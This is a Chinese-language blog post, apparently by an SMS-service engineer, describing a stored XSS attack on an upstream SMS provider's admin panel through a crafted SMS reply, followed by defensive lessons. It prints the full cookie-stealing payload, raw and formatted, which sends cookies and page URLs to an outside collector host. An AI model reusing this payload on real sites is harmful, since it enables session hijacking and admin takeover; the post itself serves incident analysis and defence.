某用户委托安全公司对本司（SendCloud）短信发送业务做安全检测，发现咱们的上游通道某一环节的安全漏洞。
跟踪这个过程，真的十分有趣。

这是 XSS 第一次发生在我身边，怎么也不会想到有人会犯这么弱智的错误。最基本的页面输出转义都没做。
页面内容输出转义、SQL 防注入、表单的 CSRF token 校验，应该算是 Web 站点搭建的基础工作吧！

过程

1. 用户通过我们的短信服务往安全公司指定手机号推送消息

2. 安全公司回复以下内容（会经过运营商反馈给通道）：

   html <script src=https://xss.chinacycc.com/EDQmSg?1554797849></script>

3. 上游通道后台管理页面未做处理，admin 用户登录之后，查看短信回复内容页面时，页面直接输出了回复内容，导致 XSS —— 站外不安全脚本被加载执行。

4. 脚本获取重要信息（document.location.href，top.location.href，document.cookie，window.opener.location.href），发送给指定地址。
5. 安全公司利用 Cookie 直接就访问了上游通道的后台，而且还是最高权限。

...

我们利用用户反馈过来的这段信息，同样登录了这个后台，确认后台真的加载了这段 JS。

估计是框架拦截请求，采用 jquery 加载，还加上了时间戳。

请求伪造了一个图片请求用于上传数据。

经验与教训

1. 自身业务安全性之外，应该经常做全链路的业务安全性检测，不能让用户对我们的业务安全性产生质疑。
   数据泄露真的是太严重了，如果是恶意的，那...
   之前没人注意到这个问题，是更可怕的事情。
2. 我就在中网讯通后台这么闲逛，他们就是没有任何感觉（我们已经通过正常途径在通知他们了）。
   除了基础的防范手段之外，应该：
   1. 管理后台尽量不要暴露到公网
   2. 尽量一个用户只允许在一个地方登录
   3. 记录用户登录信息，连用户账号的认证错误都记下来
   4. 将 IP、UserAgent 等指纹数据和 SESSION ID 关联起来，除了使用 SESSION ID 检验之外，还应该判断这些指纹数据能不能匹配得上。（好像淘宝网，还是哪里，有一个 JS 专门用来计算 B 端指纹，对反爬也有帮助）
   5. 对管理后台的疑似非正常登录（不是之前常用 IP，浏览器等）应该有告警，并立即处理。
   6. ...先就说这么多吧

附：脚本

(function(){(new Image()).src='http://xss.chinacycc.com/index.php?do=api&id=EDQmSg&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='https://xss.chinacycc.com/index.php?do=keepsession&id=EDQmSg&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

格式化之后

(function() {
  (new Image()).src = 'http://xss.chinacycc.com/index.php?do=api&id=EDQmSg&location=' + escape((function() {
    try {
      return document.location.href
    } catch(e) {
      return ''
    }
  })()) + '&toplocation=' + escape((function() {
    try {
      return top.location.href
    } catch(e) {
      return ''
    }
  })()) + '&cookie=' + escape((function() {
    try {
      return document.cookie
    } catch(e) {
      return ''
    }
  })()) + '&opener=' + escape((function() {
    try {
      return (window.opener && window.opener.location.href) ? window.opener.location.href: ''
    } catch(e) {
      return ''
    }
  })());
})();
if ('' == 1) {
  keep = new Image();
  keep.src = 'https://xss.chinacycc.com/index.php?do=keepsession&id=EDQmSg&url=' + escape(document.location) + '&cookie=' + escape(document.cookie)
};